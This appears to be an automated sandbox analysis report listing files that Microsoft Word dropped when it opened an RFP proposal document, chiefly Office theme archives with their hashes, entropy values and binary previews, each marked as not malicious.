                                                      Preview:MSCF....]M......D...............=...........]M...?..........}..."..............Li. .content.inf............Li. .Gallery.thmx.].(.Vq..[.....0Y..........v.....w.wwwww.wwwwww.w.....".83....y8..mg...o*..U..N(..@uD.:O<........{.G....~~.....c.c.5..6./|G .@#1O.B.............PT@...b.d.~..U....B.{.........0.H.....`.H.`..'S.......Ic..W..x...z....... .........g......._....o......S......p...$....._........._...K......x..?.6.U~...'./.r.................../.......5.8..2........2b.@j ....0.........``....H... ,5...........X........|..Y.QoiW..*|.......x.sO8...Yb....7...m..b.f.hv..b......=...:Ar.-...[..A\.D..g..u....].9..M...'.R-`.....<..+.....]...1.^..I.z..W{.._....L.. ...4;..6O.....9,.-.Vt+b/$7..}.O05.Y...-..S.....$*.....1."Z.r;.!..E.mMN..s .U...P%.[.P...cU...j...h.d.../.s..N/..:..X*...p5.7\}h.Q ..._.F.X.C..z$.nV..+.k..|.@.L...&.........^#.G.a..x..w!wx.8e+..E. i..$?9..8...:......|..[."..y..&y..?...W....s..._...3Z0c.....i.q.........1c.jI....W..^%xH.._...n.......&J..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 1049713 bytes, 2 files, at 0x44 +A "content.inf" +A "Savon.thmx", flags 0x4, ID 60609, number 1, extra bytes 20 in head, 37 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):1065873
                                                      Entropy (8bit):7.998277814657051
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:E1101CCA6E3FEDB28B57AF4C41B50D37
                                                      SHA1:990421B1D858B756E6695B004B26CDCCAE478C23
                                                      SHA-256:69B2675E47917A9469F771D0C634BD62B2DFA0F5D4AF3FD7AFE9196BF889C19E
                                                      SHA-512:B1EDEA65B6D0705A298BFF85FC894A11C1F86B43FAC3C2149D0BD4A13EDCD744AF337957CBC21A33AB7A948C11EA9F389F3A896B6B1423A504E7028C71300C44
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....q.......D...........................q... ?..........{...%..............M. .content.inf.Q_.........M. .Savon.thmx...O>.o..[..............&.5....UUcC.C....A...`TU...F....".54.E.....g.-.7-D....1g...p.6......@..w(....h'?.....(..........p..J.2n$4.........A......?...........@.C.W.R.5X..:..*..I..?....r.y..~!.....!.A.a...!........O.........5.x<C...?.?....C.C.......'....F../....../.$................4.7...................P...(.w.}6.........7.....01.1r........._..?.............'.._..JOx.CFA<.........*0..2.?...>F.../...;..6-8..4...8&yb....".1%..v'..N...x......}.gYb..~L.....f[..!......Y.G.....p..r...?.p...F.Vy.....o.Whll...+...M.V...:.]...B.%.H....n..@.].zaVxf...y{.@....V.t.W....$Kp-.....7W.J..h..0A3mK.=.ub..R...W......*'T2..G#G,.^..T..XZu...U. ...76.d..#.I.JB.v...d...%.....6..O.K.[.:.L.\.....1.D..2a.>f......X...b5...ZgN.u.f...a!..."...sx....>..?.a.3.8.^._q..JS1.E..9..Lg.n.+....lE.f:j.9)Q..H1=..<.R.......{c>:.p[..S.9h.a.gL.U....8.z..z.!.....2I.~.b..2..c...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 1081343 bytes, 2 files, at 0x44 +A "Circuit.thmx" +A "content.inf", flags 0x4, ID 11309, number 1, extra bytes 20 in head, 45 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):1097591
                                                      Entropy (8bit):7.99825462915052
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:BF95E967E7D1CEC8EFE426BC0127D3DE
                                                      SHA1:BA44C5500A36D748A9A60A23DB47116D37FD61BC
                                                      SHA-256:4C3B008E0EB10A722D8FEDB325BFB97EDAA609B1E901295F224DD4CB4DF5FC26
                                                      SHA-512:0697E394ABAC429B00C3A4F8DB9F509E5D45FF91F3C2AF2C2A330D465825F058778C06B129865B6107A0731762AD73777389BB0E319B53E6B28C363232FA2CE8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D...............-,..............x?..........}...-...RU.........M. .Circuit.thmx.....RU.....M. .content.inf.g...&|..[......=..R.....=.*,.!QA?h..Q.!....Uk!.HJ.......VKuk.....q.w.w.U.....;...K.@.URA..0..B..|rv.ND(.`{..@.1.}...s?.....-...O.(V.w..1..a.....aW...a.Z..aX....5.I...!..........(. ./.d...me.( ..f.........w.......Xp.s....c..vB.98.....C.J......V ..ML.M...B.n.>...|....u!.5@t..q4....(K...u qL.S....>/%v%.2..TF.].e..'..-..L.N..c].a..(WU\o.%^..;...|o.6..L..[..;&....^p.Lu.sr,-.R=.:.8.>VOB...:.?$.*h.o....Zh.h....`.B.c.../K......b^...;2..bY.[.V.Q8....@..V7....I0c.cQN7..I.p..}..!..M....1K....+....9.2......a..W.V..........;.J .i......]%O.-......CeQ.0.c....MbP3.0.w..8w..Y...|...H;#.J.+M......>.`y..aWk|.i.BF.pJv;.....S..6....F.....RLG~..........J.=......"..........H.....h..o...u........M.6F?.F.p.B.>./*l....J.R..#P.....K......<iu..gm^..n...#c..zO"7M.O......4'>A..(.E.Cy.N.)....6.tx.r[.....7.......m.t..E?.....5.5.6.\..{.V.T.D.j..=~a^.I
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 1291243 bytes, 2 files, at 0x44 +A "content.inf" +A "Droplet.thmx", flags 0x4, ID 47417, number 1, extra bytes 20 in head, 54 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):1310275
                                                      Entropy (8bit):7.9985829899274385
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:9C9F49A47222C18025CC25575337A965
                                                      SHA1:E42EDB33471D7C1752DCC42C06DD3F9FDA8B25F0
                                                      SHA-256:ADA7EFF0676D9CCE1935D5485F3DDE35C594D343658FB1DA42CB5A48FC3FC16A
                                                      SHA-512:9FDCBAB988CBE97BFD931B727D31BA6B8ECF795D0679A714B9AFBC2C26E7DCF529E7A51289C7A1AE7EF04F4A923C2D7966D5AF7C0BC766DCD0FCA90251576794
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF...........D...............9..............XJ..........}...6..............M.. .content.inf............M.. .Droplet.thmx..m7.>J..[...............2.QQPIj.*.."o^R.H5*^...^(e.W...R..x..^`..m...."..+.....{o.......Q.-....$V.N>...T]..L.... ..N.h..dOY.......S......N.%.d..d....Y.....e..$...<.m...`............@....=.z..n..[...,G..1Fn.qPDH{C<...3.Q...2..r..*...E.E.E.ErM"&a..'..W....:...?I..<.I..6o.`.d.?!..!..._.4\.._.E..).._O.S....; ..#..p.H.....c....o\.K..?$U.e.........!...J.v.....gNe._..[....#A.O.n_.....gm:P._.........{@..-g..j.69b.NH.I.$Hk?.6.n...@......'.C.._.U..:*,j.-G.....e.#.Sr.t.L......d[.[...s.....rx.3.F[.5o..:....K*.x..)M.fb...3IP.&h.Q.VX^%U.......x..l......@6.k.P..zSW.?....F..[L...4..b.l.w."&.....`.j...i.5}".~.-.....{\.:...o.'H\*+)....3.Y......\...f:.;....e........4't7..f...w..j...3....N..9`.J...P..?.....=3_.y]...f.<.......JM5.}Q/ .F.a..Z.._yh......V..>m .......a....f....!.hz..\.....F_..'z...,....h.=.......=.o..T....3.e..........$..g.2.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 1750009 bytes, 2 files, at 0x44 +A "content.inf" +A "Slate.thmx", flags 0x4, ID 28969, number 1, extra bytes 20 in head, 72 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):1766185
                                                      Entropy (8bit):7.9991290831091115
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:828F96031F40BF8EBCB5E52AAEEB7E4C
                                                      SHA1:CACC32738A0A66C8FE51A81ED8E27A6F82E69EB2
                                                      SHA-256:640AD075B555D4A2143F909EAFD91F54076F5DDE42A2B11CD897BC564B5D7FF7
                                                      SHA-512:61F6355FF4D984931E79624394CCCA217054AE0F61B9AF1A1EDED5ACCA3D6FEF8940E338C313BE63FC766E6E7161CAFA0C8AE44AD4E0BE26C22FF17E2E6ABAF7
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF............D...............)q..............0?..........{...H..............M.. .content.inf.;.#........M.. .Slate.thmx.p.+..P..[......U..............p..K.!.......*...K..w..v........=....D$r...B....6 ...X.F0..d..m.s...$$r........m.)6.m3....vXn.l..o...a...V......Ru.:=2M.........T.....4S`EP......\..r,..v...G.P......'._H0]..%_............X.P.,.............H.?.-.H..".......M..&..o....R........<......`...D.H.._.G.Qv..(.*.U,.9..D...."..T..i.e../.e.."....,S...o.X.....c./..V....Z..o.O..2....{...+... ....0.@J.R.Q.m.....{.....h?u.q.O{...l.d)..Yk`.....#...u.-.m..#CXwrz4..7.>......v.E:.#.oGSKS.TX.Chm.4aQ......avH..{..j+@6[k].....`c..W8..j.v.Zh.]....4......K..#Hzyd..K}.....H|<H..\(l...+..%Z......~.S:^..d>..1..H%..7N-v.....Wu.*..b^.B.....k0gc.2.{.!...E7.}3.d...{.Ye...&#f6...:2......v..&!..k0d.p.b...,..$.....Y..60...h.N}.r...<[./........{...Es..&.nf.....2.@Fh3.9.G....l.[.C..SD/6.H.K....}..m....M..........gl.P.]..I......5....e.c...V....P...[.=.......O.eq+
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 1865728 bytes, 2 files, at 0x44 +A "content.inf" +A "Damask.thmx", flags 0x4, ID 63852, number 1, extra bytes 20 in head, 68 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):1881952
                                                      Entropy (8bit):7.999066394602922
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:53C5F45B22E133B28D4BD3B5A350FDBD
                                                      SHA1:D180CFB1438D27F76E1919DA3E84F307CB83434F
                                                      SHA-256:8AF4C7CAC47D2B9C7ADEADF276EDAE830B4CC5FFE7E765E3C3D7B3FADCB5F273
                                                      SHA-512:46AD3DA58C63CA62FCFC4FAF9A7B5B320F4898A1E84EEF4DE16E0C0843BAFE078982FC9F78C5AC6511740B35382400B5F7AC3AE99BB52E32AD9639437DB481D1
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....x......D...............l............x..`?..........|...D..............M[. .content.inf...!........M[. .Damask.thmx...o.PI..[.............../.TU.jj0..3jCUPU.jF...m.UU.P}.....PU..*........w..#....E..].................A.. w.$..@..'g.......6%:..r9..d.M;M+.r.8[d{.s..dh..(P..........!.. ..ne..f.Nc..#..Y..q....KB}..b].@..F.&.t....E.........@&.m......$w......q...:.H....p.p.....?.9x.. .....?...ao....I....................o......g.u..;."....O;....{..(k..._.w/.Z......Jb..P.O?...........?....F....ty..72......! #....v..J......?.....!,.5.7..Em.....is.h.. \.H*)i1v..zwp.....P.....x].X{O//..\....Z>z....6...+..a.c...;.K..+...?014..p.w%o^.....]...MguF...`....r.S.......eF..):.dnk#.p{..<..{..Ym...>...H......x.}.hI..M....e......*G.&.?..~.~G6.....+...D..p...._...T....F6.[Cx./Q..Xe.>.;.}>.^..:..SB.X..2.......(A..&j9....\\.......Haf+]Y...$t^Y=........><.w....tL../E...%6.Vr~MI...l.....<.0.I....7.Q8y.f.uu...I.p..O..eYYS.O......9..Qo.......:..........o.............{
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 2511552 bytes, 2 files, at 0x44 +A "content.inf" +A "Main_Event.thmx", flags 0x4, ID 59889, number 1, extra bytes 20 in head, 90 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):2527736
                                                      Entropy (8bit):7.992272975565323
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:F256ACA509B4C6C0144D278C7036B0A8
                                                      SHA1:93F6106D0759AFD0061F73B876AA9CAB05AA8EF6
                                                      SHA-256:AD26761D59F1FA9783C2F49184A2E8FE55FCD46CD3C49FFC099C02310649DC67
                                                      SHA-512:08C57661F8CC9B547BBE42B4A5F8072B979E93346679ADE23CA685C0085F7BC14C26707B3D3C02F124359EBB640816E13763C7546FF095C96D2BB090320F3A95
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....R&.....D............................R&.8?..............Z..............M). .content.inf..,........M). .Main_Event.thmx......R..[...............=.1.^xa..^...../..^x....QA^"....^/.I.{/F..F..........6Vn. ..._Hmc......<....#.{.@.....Xl../Y....Ye..'V.f.S.Vf.T..0t+..y...5O...{.....-.dT...........!...[ .ns..k.....QAA.. ....B..u.`.....{.\u8.0.....@t........K....@..w.......>...-1F...........1.E....O............_M.m..CP.O......X......g......].../..:C...Q...i.._"...M..1o...S../...9....k;...}S........y..;1o....1h......t.CL.3...].@...T...4.6.}.....M...f...[.s.."f....nZ.W......0.c.{.`.^..Oo.[.JT.2].^.f..a....kO......Q..G..s.5...V.Wj.....e...I,]...SHa..U.N.N.....v.C.....x..J{.Z.t...]WN...77BO-J......g......3:i..2..EFeL.,n..t:..,~4gt.w...M.5.'h.L..#..A&.O.ys%K.Z....F.PW..=jH...jGB.i..j.J.^.#.\n...J@.....-5.f.1jZ68.o...H2.......$O...>..ld&,#$.&_....yl.fkP$.........l....s....i.tx.~<.z...>..2.Gx..B..z.E.3.N<....`$.....b..?.w.[.X..1.=q!.s......v.......r.w
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 2573508 bytes, 2 files, at 0x44 +A "content.inf" +A "Mesh.thmx", flags 0x4, ID 62129, number 1, extra bytes 20 in head, 94 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):2591108
                                                      Entropy (8bit):7.999030891647433
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:BEB12A0464D096CA33BAEA4352CE800F
                                                      SHA1:F678D650B4A41676BA05C836D462F34BDC5BF648
                                                      SHA-256:A44166F5C9F2553555A43586BA5DB1C1DE54D72D308A48268F27C6A00076B1CA
                                                      SHA-512:B6E7CCD1ECBB9A49FC72E40771725825DAF41DDB2FF8EA4ECCE18B8FA1A59D3B2C474ADD055F30DA58C7E833A6E6555EBB77CCC324B61CA337187B4B41F7008B
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF.....D'.....D............................D'..D..........z...^..............M7. .content.inf............M7. .Mesh.thmx....&~j..[.....0.................]............ww,v.\....D......3m..m!f..0..E{..?..`..A...k.:....I..........|bmG.FS...f.;.J.vzb.......R.......-....|.......ESD.....".4M..M..t.N....y..,..#.4.5.2.......'.8.Q..3.D..T....!.......&rJg...s........(..9........Dw..'....9.-..G.c............E.. .O.....a..O.._..s..)7Wz~....bJ..D...o....0..R/.#...?.......~6.Q?....?y...g.?............TP..r-...>....-..!.6...B.....\../...2....4...p$...Oge.G.?.....S.#x(..$.A~.U.%f....dJ..S.f{.g.._..3{.fm2.....Z.\o&.[k.m....ko.8..r.-.Go.OQ..'!6..f.L...Ud.$.q*.L.....R.. J.T&4g...7.2K...#k.[.].:....lk.....;c..DRx.`..&L..cpv*.>.Ngz~.{..v5.\...'C.<R:.C8.|.fE{......K...).....T...gz}..rF..Q.dof7.....D.f=cm...U|.O.]F...5zg(.. ....S..._?D....^..+.i...Z.....+X..U!4qy..._..`I..>./.W.7......=.O....BG..=..%9|...3.?...}.$"..H..u...0.......a..:t?.....8...Z..#g.=<.e.`\......KQ..U....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                      Category:dropped
                                                      Size (bytes):3256855
                                                      Entropy (8bit):7.996842935632312
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                      SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                      SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                      SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                      Category:dropped
                                                      Size (bytes):3417042
                                                      Entropy (8bit):7.997652455069165
                                                      Encrypted:true
                                                      SSDEEP:
                                                      MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                      SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                      SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                      SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):3072
                                                      Entropy (8bit):1.9099558134017904
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FEFB146E76FC9AC0D49F836C59318DE8
                                                      SHA1:5B67AFC7D2DAB9DC74666F406AC1707351B6C8F5
                                                      SHA-256:E84A625B77C3004D9CAEFC24FE2FF59DF8FF5958C10F6F9578A107B1AA87BCB0
                                                      SHA-512:7A8D7C8A32DEAD9DE95541460D50315F23775FD104546C67170BEC93F4BBDD422B44F314F567B1417F03246FCFE4D8652A2C87BB04A2F16C537F716949F30CBC
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):30
                                                      Entropy (8bit):1.0370104374629148
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:1EC7BFF661CF24755AA62E95529118E7
                                                      SHA1:3CF0165A76550F1268D57528A439064D6CBF83D0
                                                      SHA-256:F6157710CDC1143F2E2B90C131CCD5C37DC95C0E46C09856720334C3142D593D
                                                      SHA-512:9D0A01EA94E671F100372C2CFEF3FDFB3C502A6D025C4E96B1CEE348920A5A0AABF01DE549ED2A931E5188616208476A8D3E2ABAF4AA4DFF6F6458FBB7534FFB
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:..............................
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 7 13:49:04 2024, mtime=Thu Dec 12 16:35:59 2024, atime=Thu Dec 12 16:35:57 2024, length=28185, window=hide
                                                      Category:dropped
                                                      Size (bytes):600
                                                      Entropy (8bit):4.687607446633468
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:90CE2C9E7FE7F2C0C00E6D89EFDA64FD
                                                      SHA1:D7F7F9E04B4D0DC98C1672D8FBA87D1B7ED35FFB
                                                      SHA-256:9C855D01C7D35FE6D48242FBD73DA59A0C560DBB28C2B9EF2B5ACE802632CC1B
                                                      SHA-512:BADEBECCBFB75340079C144674DE90C762E3048AE4F0788FF1B0F5BF84FDAB4BE4FBCC5A3A77EB1C00116FDA1A8D507A58FCAD9AA1F93E17D4D8F75797D27A11
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:L..................F.... ....#...Y....N.L..z.AM.L...n..........................2..n...Y}. .2024TE~1.DOC..p......GX#v.Y}............................>..2.0.2.4. .T.e.p.a. .L.L.C. .R.F.P. .P.r.o.p.o.s.a.l...d.o.c.x.......e...............-.......d............F.......C:\Users\user\Desktop\2024 Tepa LLC RFP Proposal.docx..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.0.2.4. .T.e.p.a. .L.L.C. .R.F.P. .P.r.o.p.o.s.a.l...d.o.c.x.`.......X.......632922...........hT..CrF.f4... .{......../....%..hT..CrF.f4... .{......../....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Generic INItialization configuration [folders]
                                                      Category:dropped
                                                      Size (bytes):87
                                                      Entropy (8bit):4.702896622455003
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:15DF5E70424CD1971DB54FA0BB7817AF
                                                      SHA1:F7EA8AAA40E1C1EED4E91887C0929C68E34B8E4B
                                                      SHA-256:A82C02A9EC705B9A8931893D24F26BE1241C6183C5B041F39E29C9D8A5C3D91B
                                                      SHA-512:CA4ED784D20FE6A8B60016DC419138DDEC597863EAFA40EAE742BD4D343AA52F1175D3FF58C11C24F3912D0042B601D804A8325D251E0A4F04221D9A2CBB24ED
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:[misc]..2024 Tepa LLC RFP Proposal.LNK=0..[folders]..2024 Tepa LLC RFP Proposal.LNK=0..
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                      SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                      SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                      SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:35200E94CEB3BB7A8B34B4E93E039023
                                                      SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                                                      SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                                                      SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                      SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                      SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                      SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                      Malicious:false
                                                      Reputation:unknown
